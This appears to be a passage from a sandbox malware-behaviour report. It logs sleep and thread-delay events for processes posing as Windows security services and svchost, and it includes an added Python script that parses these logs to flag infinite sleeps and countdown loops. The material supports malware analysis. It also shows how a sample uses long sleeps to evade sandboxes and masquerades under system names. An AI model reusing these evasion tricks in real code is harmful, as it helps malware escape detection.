Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595578
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595468
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595141
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 595016
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594903
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594688
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594569
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594453
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594343
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594231
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594125
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 594015
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 593906
Source: C:\Users\user\AppData\Roaming\update.exe  Thread delayed: delay time: 593797
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 599868
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 599743
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 599625
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 599514
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 599394
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 599261
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 598601
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 598475
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 598236
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597983
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597873
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597761
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597631
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597371
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597263
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597137
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 597027
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 596806
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 596468
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 596359
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 596231
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 596124
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 595768
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 595500
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 595281
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 595171
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594515
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594297
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594182
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 594062
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593953
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593838
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593719
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593605
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593472
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593344
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593234
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593125
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 593016
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 592904
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 592793
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe  Window / User API: threadDelayed 9032
Source: C:\Users\user\AppData\Roaming\svchost.exe  Window / User API: threadDelayed 758
Source: C:\Users\user\AppData\Roaming\update.exe  Window / User API: threadDelayed 8919
Source: C:\Users\user\AppData\Roaming\update.exe  Window / User API: threadDelayed 915
Source: C:\Users\user\AppData\Roaming\Window Security.exe  Window / User API: threadDelayed 9605
Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe  Window / User API: threadDelayed 8232
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe  Window / User API: threadDelayed 9452
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1576
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe  Window / User API: threadDelayed 9911
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1131
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1614
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1167
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1345
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1080
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1178
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1111
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1131
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 1216
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 753
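The write-watch allocations, the "Thread delayed" values, the sandbox's threadDelayed counters and the "Thread sleep time" requests listed above are easier to read per process than as one flat list. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It parses evidence lines in exactly this layout (the embedded sample lines are excerpted from the report, "Jump to behavior" residue included, to show the parser tolerates it), groups them by process path and flags the two sleep patterns visible here: the value 922337203685477, which is Int64.MaxValue in 100 ns ticks expressed in whole milliseconds, i.e. a .NET "sleep forever" request such as Thread.Sleep(TimeSpan.MaxValue); and long runs of delay requests that each shrink by only a hundred or so milliseconds, which is what a "sleep until the deadline" loop looks like when every sleep returns early and the thread re-requests the remainder. The run-detection thresholds (a step of at most 2000 ms, at least five requests) are my choices, not anything the report states.

```python
"""Per-process summary of sandbox sleep/allocation evidence lines.

Added example for this report page, not Joe Sandbox code. Thresholds below
are the author's assumptions, not values taken from the report.
"""
import re
from collections import defaultdict

# Int64.MaxValue ticks (100 ns each) in whole milliseconds: the number a .NET
# Thread.Sleep(TimeSpan.MaxValue) / "sleep forever" request is reported as.
INFINITE_SLEEP_MS = (2**63 - 1) // 10_000          # 922337203685477

# "Source: <path>.exe[ TID: n]<event kind><rest>"; the raw page has no space
# between ".exe" and the event kind, so the separator is optional.
EVENT_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?\.exe)\s*(?:TID:\s*\d+)?\s*"
    r"(?P<kind>Memory allocated|Thread delayed|Window / User API|Thread sleep time)"
    r"(?P<rest>.*)$"
)
WRITE_WATCH_RE = re.compile(r"memory reserve\s*\|\s*memory write watch")
DELAY_RE = re.compile(r"delay time:\s*(\d+)")
COUNT_RE = re.compile(r"threadDelayed\s+(\d+)")
SLEEP_RE = re.compile(r"-?(\d+)s\s*>=")            # "-600000s >= -30000s"


def new_record():
    return {"write_watch_allocs": 0, "delays": [], "reported_delay_counts": [],
            "sleep_requests": []}


def parse_report_lines(lines):
    """Group the four event kinds by process path; other lines are ignored."""
    procs = defaultdict(new_record)
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        rec, kind, rest = procs[m["src"]], m["kind"], m["rest"]
        if kind == "Memory allocated" and WRITE_WATCH_RE.search(rest):
            rec["write_watch_allocs"] += 1
        elif kind == "Thread delayed" and (d := DELAY_RE.search(rest)):
            rec["delays"].append(int(d[1]))
        elif kind == "Window / User API" and (c := COUNT_RE.search(rest)):
            rec["reported_delay_counts"].append(int(c[1]))
        elif kind == "Thread sleep time" and (s := SLEEP_RE.search(rest)):
            rec["sleep_requests"].append(int(s[1]))
    return dict(procs)


def find_countdown_runs(delays, max_step_ms=2000, min_len=5):
    """Runs of consecutive delay requests that each shrink by a small step:
    the thread asks for N ms, gets control back after ~100 ms and re-requests
    the remainder. The first value of a run is the wait the code intended."""
    runs, i = [], 0
    while i < len(delays):
        j = i
        while j + 1 < len(delays) and 0 < delays[j] - delays[j + 1] <= max_step_ms:
            j += 1
        if j - i + 1 >= min_len:
            steps = [delays[k] - delays[k + 1] for k in range(i, j)]
            runs.append({"start_ms": delays[i], "end_ms": delays[j],
                         "length": j - i + 1,
                         "mean_step_ms": round(sum(steps) / len(steps), 1)})
        i = j + 1
    return runs


def summarize(lines):
    """Per-process flags an analyst would want next to the raw evidence."""
    out = {}
    for src, rec in parse_report_lines(lines).items():
        out[src] = {
            "write_watch_allocs": rec["write_watch_allocs"],
            "infinite_sleep": INFINITE_SLEEP_MS in rec["delays"],
            "countdown_runs": find_countdown_runs(rec["delays"]),
            "sandbox_reported_delays": sum(rec["reported_delay_counts"]),
            "max_sleep_request": max(rec["sleep_requests"], default=0),
        }
    return out


# Sample input: lines excerpted verbatim from the report above (page residue kept).
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 2D40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Window Security.exeMemory allocated: 4E40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599881Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599750Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599594Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 599079Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 598922Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 9032Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 758Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -36893488147419080s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -600000s >= -30000sJump to behavior
""".strip().splitlines()

if __name__ == "__main__":
    for src, summary in summarize(SAMPLE_LINES).items():
        print(src, summary)
```

The start of a countdown run is the wait the code intended: 600000 ms, ten minutes, for svchost.exe, update.exe and Window Security.exe in this report, which is the figure to set an analysis timeout or sleep-skipping policy against. The "memory reserve | memory write watch" allocations are counted but not scored: MEM_WRITE_WATCH reservations are normal for the .NET garbage collector, so for a managed sample like this one they describe the runtime rather than the payload.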
Source: C:\Users\user\Desktop\BTC.exe TID: 6968  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\crack.exe TID: 5756  Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\crack.exe TID: 5528  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Cracked.exe TID: 2584  Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -36893488147419080s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -599881s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -599750s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -599594s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -599079s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -598922s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -598813s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -598688s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -598450s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -598329s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -598204s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -598089s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -597844s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -597730s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -597098s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596969s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596844s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596625s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596516s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596407s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596282s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596157s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -596032s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -595922s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -595808s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -595657s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -99874s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -99764s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -99546s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -99324s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -99093s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98983s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98656s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98546s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98437s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98327s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98218s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024  Thread sleep time: -98109s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 9024Thread sleep time: -97999s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -35048813740048126s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -599869s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -599737s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -599578s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -599156s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598922s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598813s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598682s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598344s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -597891s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -597775s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -597438s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -597313s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -597188s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -597052s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596812s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596594s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596375s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596266s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596154s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -596047s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595811s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595687s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595468s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595141s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -595016s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594903s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594797s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594688s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594569s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594453s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594343s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594231s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594125s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -594015s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -593906s >= -30000s
Source: C:\Users\user\AppData\Roaming\update.exe TID: 9068 Thread sleep time: -593797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 4832 Thread sleep count: 9605 > 30
Source: C:\Users\user\AppData\Roaming\Window Security.exe TID: 8588 Thread sleep time: -599868s >= -30000s
